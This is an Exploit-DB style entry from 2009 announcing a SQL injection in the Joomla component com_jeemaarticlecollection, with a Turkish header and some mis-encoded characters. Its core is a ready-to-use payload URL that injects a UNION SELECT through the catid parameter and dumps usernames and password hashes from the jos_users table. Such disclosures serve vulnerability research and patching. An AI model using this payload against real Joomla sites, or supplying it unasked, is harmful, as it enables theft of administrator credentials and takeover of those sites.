Joomla! Component com_jeemaarticlecollection - SQL Injection

EDB-ID:

10625

CVE:

N/A


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2009-12-24


<------------------- header data start ------------------- >

#############################################################
       Joomla Component com_jeemaarticlecollection SQL injection Vulnerability                                          
#############################################################

#author        : Fl0riX

# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r

# Name        : com_jeemaarticlecollection

# Bug Type       : SQL Injection

# Infection      : Admin login bilgileri al&#65533;nabilir.

# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir. Kimsesizli&#65533;im O Dereceye Vard&#65533; Ki &#65533;evremde Bela Girdab&#65533;ndan Ba&#65533;ka D&#65533;nen Kimse Yok.(!)

# Note : Kimsesizli&#65533;im O Dereceye Vard&#65533; Ki &#65533;evremde Bela Girdab&#65533;ndan Ba&#65533;ka D&#65533;nen Kimse Yok.(!)

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection

< -- bug code end of -- >